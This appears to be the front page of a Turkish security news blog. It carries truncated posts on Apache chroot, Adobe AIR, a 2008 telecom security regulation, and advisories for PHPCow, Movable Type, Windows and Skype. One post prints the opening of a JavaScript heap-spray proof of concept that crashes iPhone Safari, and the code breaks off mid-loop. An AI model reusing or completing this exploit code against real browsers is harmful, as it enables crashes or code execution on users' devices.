Apache chroot ortamı yaratmak ve uğraşmak zor olabilir. Apache için chroot ortamı yaratmak için önce httpd prosesini çalıştırmak için gerekli kütüphane ve uygulamaları bilmeniz gerekir. Bunları çıkardıktan sonra, bu dosyaları içeren bir chroot ortamı yaratmanız gerekir. Chroot ortamını yarattıktan sonra güvenlik güncellemeleri vs çıktığında güncellemeniz gerekir. Bu işi kolaylaştırmak için araçlar olsa da (mock, makejail [...]
iPhone kullanicilari Turkiyede iPhone kullanabilmek icin firmware lerini downgrade ediyorlar peki ya guvenlik ne olucak ?
iPhone lar uzerinden surf yaparken dikkatli olmakta fayda var asagidaki gibi bir kod ile DOS mumkun.
<html><body><script>
function Demo() {
var shellcode;
var addr;
var fill;
alert(‘attempting a crash!’);
shellcode = unescape(‘%u0c0c’);
fill = unescape(‘%ucccc’);
addr = 0×02020202;
var b = fill;
while (b.length <= 0×40000) b+=b;
var c = [...]
Yakın bir zaman içinde Adobe Systems, Web 2.0 gelişim aracı AIR’i (Adobe Integrated Runtime) tanıtmıştı. Tanıtımının hemen ardından güvenlikçiler topluluğundan bazı endişeler çıktı…Bazı güvenlik uzmanları AIR’in uygulamalarından geçen yerel dosya erişimi konusunda endişeliler.
Yakınlarda FireFox, buna benzer bir savunma sorunu yaşamıştı. Bunu engellemek için Adobe AIR’in içine ‘Sandbox’ (bazı işlevlerin yasaklı olduğu limitli çalışan bir alan) [...]
20 Temmuz 2008 PAZAR
Resmî Gazete
Sayı : 26942
YÖNETMELİK
Telekomünikasyon Kurumundan:
ELEKTRONİK HABERLEŞME GÜVENLİĞİ YÖNETMELİĞİ BİRİNCİ BÖLÜM
Genel Hükümler
Amaç
MADDE 1 – (1) Bu Yönetmeliğin amacı, elektronik haberleşme güvenliğine ilişkin usul ve esasları düzenlemektir.
Kapsam
MADDE 2 – (1) Bu Yönetmelik, işletmecilerin fiziksel alan güvenliği, veri güvenliği, donanım-yazılım güvenliği ve güvenilirliği ile personel güvenilirliğinin sağlanması için tehditlerden [...]
PHPCow yazılımının eski sürümlerindeki dosya dahil etme açığı saldırganların uygulamanın kontrolünü ele geçirebilmesini sağlıyor.
Çözüm:
Hangi PHPCow sürümünün etkilendiği henüz kesin belli değil. PHPCow destek ekibi son sürümlerde bu problemin giderildiğini söylüyor. Güncellenmiş yazılımlar için PHPCow ile kontak kurunuz.
Kaynak: http://www.kb.cert.org/vuls/id/515417
Movable Type yazılımında cross site scripting saldırıları yapılabilmesini sağlayan bir açık olduğu rapor edildi.
Açığın hangi parametrelerde olduğu açıklanmadı. Aşağaıdaki sürümlerin etkilendiği rapor edildi fakat diğer sürümler de etkileniyor olabilir:
- Movable Type 4
- Movable Type 4 Enterprise
- Movable Type 4 Community Edition
- Movable Type 4 (Open Source)
- Movable Type 3
- Movable Type Enterprise 1.5
Çözüm:
En son sürüme [...]
Etkisi: Uzaktan kod çalıştırma
Risk seviyesi: Yüksek
Etkilenen sistemler: Windows 2000 SP2, SP3 ve SP4, Windows NT 4 Server SP6a, Windows NT 4.0 TSE SP6, Windows NT 4.0 Workstation SP6a ve Active Desktop kurulu NT Server 4.0 SP6a, Windows XP ve XP SP1, Windows XP 64-Bit Edition SP1 ve Version 2003, Windows Server 2003, Windows Server 2003 [...]
Geçtiğimiz cumartesi günü ShmooCon hacker konferansında güvenlik araştırmacısı Mark Loveless tarafından duyurulan açık Windows XP ve 2000 işletim sistemlerindeki bir özellikten kaynaklanıyor.
Loveless bilgisayar korsanlarının bu özelliği kötü amaçla kullanabileceklerini ve sistemin hard disk’ine erişebileceklerini söylüyor.
Windows XP veya 2000 çalıştıran bir bilgisayar boot edilip açıldığında otomatik olarak bir kablosuz ağa bağlanmaya çalışıyor. Eğer bilgisayar bir kablosuz [...]
Microsoft dün 9 farklı güvenlik açığı için 6 adet güvenlik bülteni yayınladı. Açıkların 7’si firma tarafından kritik olarak değerlendirilirken diğer ikisi önemli olarak nitelendirildi.
Symantec‘e göre en tehlikelisi Workstation servisindeki güvenlik açığı. Açıktan yararlanarak uzaktan kod çalıştırmak ve sistemin tüm kontrolünü ele geçirmek mümkün olabiliyor.
Yamalar ve güvenlik açıkları ile [...]
Skype istemcisinin tüm platformlardaki sürümlerinde bir güvenlik açığı olduğu tespit edildi. Açığı kullanarak Skype’ı uzaktan çökertmek veya kod çalıştırmak mümkün olabiliyor. Açığı tespit eden EADS/CRC güvenlik ekibi açığı kullanarak kod çalıştırmanın da mümkün olabildiğini belirtmiş fakat Skype yaptığı duyuruda etkisini “istemcinin çökmesi” olarak belirtmiş.
Çözüm:
Aşağıdaki sürümlere güncellemek gerekiyor:
Skype for [...]
Kısaca Hakkımızda.